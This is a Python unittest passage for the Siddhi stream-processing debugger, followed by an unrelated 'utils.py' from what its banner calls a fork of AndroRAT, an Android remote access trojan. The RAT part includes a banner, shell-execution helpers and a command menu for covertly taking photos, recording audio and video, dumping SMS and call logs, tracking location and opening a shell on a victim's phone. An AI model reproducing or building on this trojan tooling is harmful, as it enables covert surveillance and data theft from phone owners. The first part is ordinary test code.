siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') " \
"define stream cseEventStream (symbol string, price float, volume int);"
query = "@info(name = 'query1') " \
"from cseEventStream#window.lengthBatch(3) select symbol, price, volume insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),
"Incorrect debug event received at IN")
elif count == 2:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),
"Incorrect debug event received at IN")
elif count == 3:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 60.0, 50], event.getOutputData(),
"Incorrect debug event received at IN")
elif count == 4:
_self_shaddow.assertEquals("query1OUT", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertEquals(3, _self_shaddow.getCount(event), "Incorrect number of events received")
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
inputHandler.send(["WSO2", 60.0, 50])
sleep(0.1)
self.assertEquals(3, self.inEventCount.get(), "Invalid number of output events")
self.assertEquals(6, self.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger3(self):
logging.info("Siddi Debugger Test 3: Test next traversal in a query with time batch window")
siddhiManager = SiddhiManager()
cseEventStream = "define stream cseEventStream (symbol string, price float, volume int);"
query = "@info(name = 'query1')" \
+ "from cseEventStream#window.timeBatch(3 sec) " \
+ "select symbol, price, volume " + "insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
current_milli_time = lambda: int(round(time.time() * 1000))
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + "\t" + str(current_milli_time()))
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),
"Incorrect debug event received at IN")
elif count == 2:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),
"Incorrect debug event received at IN")
elif count == 3:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 60.0, 50], event.getOutputData(),
"Incorrect debug event received at IN")
# next call will not reach OUT since there is a window
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
inputHandler.send(["WSO2", 60.0, 50])
sleep(4)
self.assertEquals(3, self.inEventCount.get(), "Invalid number of output events")
self.assertEquals(3, self.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger4(self):
logging.info(
"Siddi Debugger Test 4: Test next traversal in a query with time batch window where next call delays 1 sec")
siddhiManager = SiddhiManager()
cseEventStream = "define stream cseEventStream (symbol string, price float, volume int);"
query = "@info(name = 'query1')" + \
"from cseEventStream#window.timeBatch(1 sec) " + \
"select symbol, price, volume " + \
"insert into OutputStream;"
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
_self_shaddow.assertEquals(1, len(events), "Cannot emit all three in one time")
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count != 1 and queryTerminal.name == SiddhiDebugger.QueryTerminal.IN.name:
sleep(1.1)
# next call will not reach OUT since there is a window
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
inputHandler.send(["WSO2", 60.0, 50])
sleep(1.5)
self.assertEquals(3, self.inEventCount.get(), "Invalid number of output events")
self.assertEquals(3, self.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger5(self):
logging.info("Siddi Debugger Test 5: Test play in a simple query")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') define stream cseEventStream (symbol string, price float, " + \
"volume int);"
query = "@info(name = 'query1')" + \
"from cseEventStream " + \
"select symbol, price, volume " + \
"insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),
"Incorrect debug event received at IN")
elif count == 2:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),
"Incorrect debug event received at OUT")
debugger.play()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
sleep(0.1)
self.assertEquals(2, self.inEventCount.get(), "Invalid number of output events")
self.assertEquals(2, self.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger6(self):
logging.info("Siddi Debugger Test 6: Test play traversal in a query with length batch window")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') define stream cseEventStream (symbol string, price float, " + \
"volume int);"
query = "@info(name = 'query1')" + \
"from cseEventStream#window.lengthBatch(3) " + \
"select symbol, price, volume " + \
"insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),
"Incorrect debug event received at IN")
elif count == 2:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),
"Incorrect debug event received at IN")
elif count == 3:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 60.0, 50], event.getOutputData(),
"Incorrect debug event received at IN")
debugger.play()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
inputHandler.send(["WSO2", 60.0, 50])
sleep(0.1)
self.assertEquals(3, self.inEventCount.get(), "Invalid number of output events")
self.assertEquals(3, self.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger7(self):
logging.info("Siddi Debugger Test 7: Test play traversal in a query with time batch window")
siddhiManager = SiddhiManager()
cseEventStream = "define stream cseEventStream (symbol string, price float, volume int);";
query = "@info(name = 'query1')" + \
"from cseEventStream#window.timeBatch(3 sec) " + \
"select symbol, price, volume " + \
"insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
current_milli_time = lambda: int(round(time.time() * 1000))
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + "\t" + str(current_milli_time()))
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),
"Incorrect debug event received at IN")
elif count == 2:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),
"Incorrect debug event received at IN")
elif count == 3:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 60.0, 50], event.getOutputData(),
"Incorrect debug event received at IN")
debugger.play()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
inputHandler.send(["WSO2", 60.0, 50])
sleep(3.5)
self.assertEquals(3, self.inEventCount.get(), "Invalid number of output events")
self.assertEquals(3, self.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger8(self):
logging.info(
"Siddi Debugger Test 8: Test play traversal in a query with time batch window where play call delays" + \
" 1 sec")
siddhiManager = SiddhiManager()
cseEventStream = "define stream cseEventStream (symbol string, price float, volume int);"
query = "@info(name = 'query1')" + \
"from cseEventStream#window.timeBatch(1 sec) " + \
"select symbol, price, volume " + \
"insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
_self_shaddow.assertEquals(1, _self_shaddow.getCount(event),
"Only one event can be emitted from the window")
if count != 1 and "query1IN" == queryName:
sleep(1)
debugger.play()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
inputHandler.send(["WSO2", 60.0, 50])
sleep(1.5)
self.assertEquals(3, self.inEventCount.get(), "Invalid number of output events")
self.assertEquals(3, self.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger9(self):
logging.info("Siddi Debugger Test 9: Test state traversal in a simple query")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') define stream cseEventStream (symbol string, price float, " + \
"volume int);"
query = "@info(name = 'query1')" + \
"from cseEventStream#window.length(3) " + \
"select symbol, price, sum(volume) as volume " + \
"insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 2:
queryState = debugger.getQueryState(queryName)
logging.info(queryState)
streamEvent = None
# Order of the query state items is unpredictable
for (k, v) in queryState.items():
if k.startswith("AbstractStreamProcessor"):
streamEvent = v["ExpiredEventChunk"]
break
_self_shaddow.assertListEqual(streamEvent.getOutputData(), ["WSO2", 50.0, None])
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
sleep(1)
self.assertEquals(2, self.inEventCount.get(), "Invalid number of output events")
self.assertEquals(4, self.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger10(self):
logging.info("Siddi Debugger Test 10: Test next traversal in a query with two consequent streams")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') " + \
"define stream cseEventStream (symbol string, price float, volume int); " + \
"define stream stockEventStream (symbol string, price float, volume int); "
query = "@info(name = 'query1')" + \
"from cseEventStream " + \
"select symbol, price, volume " + \
"insert into stockEventStream; " + \
"@info(name = 'query2')" + \
"from stockEventStream " + \
"select * " + \
"insert into OutputStream;"
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if 1 <= count <= 4:
# First four events
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),
"Incorrect debug event received")
else:
# Next four events
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),
"Incorrect debug event received")
if (count == 1 or count == 5):
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
elif (count == 2 or count == 6):
_self_shaddow.assertEquals("query1OUT", queryName + queryTerminal.name, "Incorrect break point")
elif (count == 3 or count == 7):
_self_shaddow.assertEquals("query2IN", queryName + queryTerminal.name, "Incorrect break point")
else:
_self_shaddow.assertEquals("query2OUT", queryName + queryTerminal.name, "Incorrect break point")
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
sleep(0.1)
self.assertEquals(2, self.inEventCount.get(), "Invalid number of output events")
self.assertEquals(8, self.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger11(self):
logging.info("Siddi Debugger Test 11: Modify events during debug mode")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') " + \
"define stream cseEventStream (symbol string, price float, volume int); " + \
"define stream stockEventStream (symbol string, price float, volume int); "
query = "@info(name = 'query1')" + \
"from cseEventStream " + \
"select symbol, price, volume " + \
"insert into stockEventStream; " + \
"@info(name = 'query2')" + \
"from stockEventStream " + \
"select * " + \
"insert into OutputStream;"
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if (count == 1 or count == 2):
# WSO2 in stream 1
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),
"Incorrect debug event received")
else:
# IBM in stream 2
_self_shaddow.assertListEqual(["IBM", 50.0, 60], event.getOutputData(),
"Incorrect debug event received")
if count == 2:
# Modify the event at the end of the first stream
# TODO Improve the logic to use assignment operator (writeBacks by assignment operator)
event.setOutputData("IBM", 0)
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
sleep(0.1)
self.assertEquals(1, self.inEventCount.get(), "Invalid number of output events")
self.assertEquals(4, self.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger12(self):
logging.info("Siddi Debugger Test 12: Test debugging two queries with concurrent input")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') " + \
"define stream cseEventStream (symbol string, price float, volume int); " + \
"define stream stockEventStream (symbol string, price float, volume int); "
query = "@info(name = 'query1')" + \
"from cseEventStream " + \
"select * " + \
"insert into OutputStream1; " + \
"@info(name = 'query2')" + \
"from stockEventStream " + \
"select * " + \
"insert into OutputStream2;"
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl1(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream1", OutputStreamCallbackImpl1())
class OutputStreamCallbackImpl2(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream2", OutputStreamCallbackImpl2())
cseEventStreamInputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
stockEventStreamInputHandler = siddhiAppRuntime.getInputHandler("stockEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
siddhiDebugger.acquireBreakPoint("query2", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def __init__(self):
SiddhiDebuggerCallback.__init__(self)
self.queryOneResumed = AtomicInt(0)
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
_self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if ("query1IN" == queryName):
sleep(1)
self.queryOneResumed.set(1)
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),
"Incorrect debug event received")
elif "query2IN" == queryName:
# If query2IN is reached, query1IN must left that break point
_self_shaddow.assertTrue(self.queryOneResumed.get(),
"Query 2 thread enterted the checkpoint before query 1 is debugged")
_self_shaddow.assertListEqual(["IBM", 45.0, 80], event.getOutputData(),
"Incorrect debug event received")
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
def thread1_worker():
cseEventStreamInputHandler.send(["WSO2", 50.0, 60])
thread1 = threading.Thread(target=thread1_worker)
thread1.start()
def thread2_worker():
stockEventStreamInputHandler.send(["IBM", 45.0, 80])
thread2 = threading.Thread(target=thread2_worker)
thread2.start()
sleep(2)
self.assertEquals(2, self.inEventCount.get(), "Invalid number of output events")
self.assertEquals(4, self.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_set_debugger_callback(self):
logging.info("Siddi Debugger Wrapper Test 1: Set Debugger Callback")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') define stream cseEventStream (symbol string, price float, volume int);"
query = "@info(name = 'query 1') from cseEventStream select symbol, price, volume insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class StreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", StreamCallbackImpl()) # Causes GC Error
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
# Callback1
class SiddhiDebuggerCallbackImpl1(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query 1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),
"Incorrect debug event received at IN")
else:
# No more events should be received
_self_shaddow.fail("The callback has not been released")
debugger.play()
# Callback2
class SiddhiDebuggerCallbackImpl2(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 2:
_self_shaddow.assertEquals("query 1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),
"Incorrect debug event received at IN")
else:
# No more events should be received
_self_shaddow.fail("Invalid event count")
debugger.play()
siddhiDebugger.acquireBreakPoint("query 1", SiddhiDebugger.QueryTerminal.IN)
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl1())
inputHandler.send(["WSO2", 50.0, 60])
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl2())
inputHandler.send(["WSO2", 70.0, 40])
self.assertEquals(2, _self_shaddow.inEventCount.get(), "Invalid number of output events")
self.assertEquals(2, _self_shaddow.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_acquire_release_breakpoint(self):
logging.info("Siddi Debugger Wrapper Test 2: Acquire and Release Break Point")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') " \
"define stream cseEventStream (symbol string, price float, volume int);"
query = "@info(name = 'query 1') from cseEventStream select symbol, price, volume insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class StreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", StreamCallbackImpl()) # Causes GC Error
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query 1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),
"Incorrect debug event received at IN")
elif count == 2:
_self_shaddow.assertEquals("query 1OUT", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),
"Incorrect debug event received at IN")
else:
# No more events should be received
_self_shaddow.fail("The breakpoint has not been released")
debugger.play()
siddhiDebugger.acquireBreakPoint("query 1", SiddhiDebugger.QueryTerminal.IN)
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
siddhiDebugger.releaseBreakPoint("query 1", SiddhiDebugger.QueryTerminal.IN)
inputHandler.send(["WSO2", 70.0, 40])
sleep(0.1)
self.assertEquals(2, _self_shaddow.inEventCount.get(), "Invalid number of output events")
self.assertEquals(1, _self_shaddow.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
if __name__ == '__main__':
unittest.main()
|
utils.py
|
import sys
import os
import base64
import time
import binascii
import select
import pathlib
import platform
import re
from subprocess import PIPE, run
from colorama import Fore, Style,init
from pyngrok import ngrok
import socket
import threading
import itertools
import queue
banner = """\033[1m\033[91m
_ _____ _______
/\ | | | __ \ /\|__ __|
/ \ _ __ __| |_ __ ___ | |__) | / \ | |
/ /\ \ | '_ \ / _` | '__/ _ \| _ / / /\ \ | |
/ ____ \| | | | (_| | | | (_) | | \ \ / ____ \| |
/_/ \_\_| |_|\__,_|_| \___/|_| \_\/_/ \_\_|
\033[93m-Forked By Vicky
"""
pattern = '\"(\\d+\\.\\d+).*\"'
def stdOutput(type_=None):
if type_=="error":col="31m";str="ERROR"
if type_=="warning":col="33m";str="WARNING"
if type_=="success":col="32m";str="SUCCESS"
if type_ == "info":return "\033[1m[\033[33m\033[0m\033[1m\033[33mINFO\033[0m\033[1m] "
message = "\033[1m[\033[31m\033[0m\033[1m\033["+col+str+"\033[0m\033[1m]\033[0m "
return message
def animate(message):
chars = "/—\\|"
for char in chars:
sys.stdout.write("\r"+stdOutput("info")+"\033[1m"+message+"\033[31m"+char+"\033[0m")
time.sleep(.1)
sys.stdout.flush()
def clearDirec():
if(platform.system() == 'Windows'):
clear = lambda: os.system('cls')
direc = "\\"
init(convert=True)
else:
clear = lambda: os.system('clear')
direc = "/"
return clear,direc
clear,direc = clearDirec()
if not os.path.isdir(os.getcwd()+direc+"Dumps"):
os.makedirs("Dumps")
def is_valid_ip(ip):
m = re.match(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$", ip)
return bool(m) and all(map(lambda n: 0 <= int(n) <= 255, m.groups()))
def is_valid_port(port):
i = 1 if port.isdigit() and len(port)>1 else 0
return i
def execute(command):
return run(command, stdout=PIPE, stderr=PIPE, universal_newlines=True, shell=True)
def executeCMD(command,queue):
result = run(command, stdout=PIPE, stderr=PIPE, universal_newlines=True, shell=True)
queue.put(result)
return result
def getpwd(name):
return os.getcwd()+direc+name;
def help():
helper="""
Usage:
deviceInfo --> returns basic info of the device
camList --> returns cameraID
takepic [cameraID] --> Takes picture from camera
startVideo [cameraID] --> starts recording the video
stopVideo --> stop recording the video and return the video file
startAudio --> starts recording the audio
stopAudio --> stop recording the audio
getSMS [inbox|sent] --> returns inbox sms or sent sms in a file
getCallLogs --> returns call logs in a file
shell --> starts a interactive shell of the device
vibrate [number_of_times] --> vibrate the device number of time
getLocation --> return the current location of the device
getIP --> returns the ip of the device
getSimDetails --> returns the details of all sim of the device
clear --> clears the screen
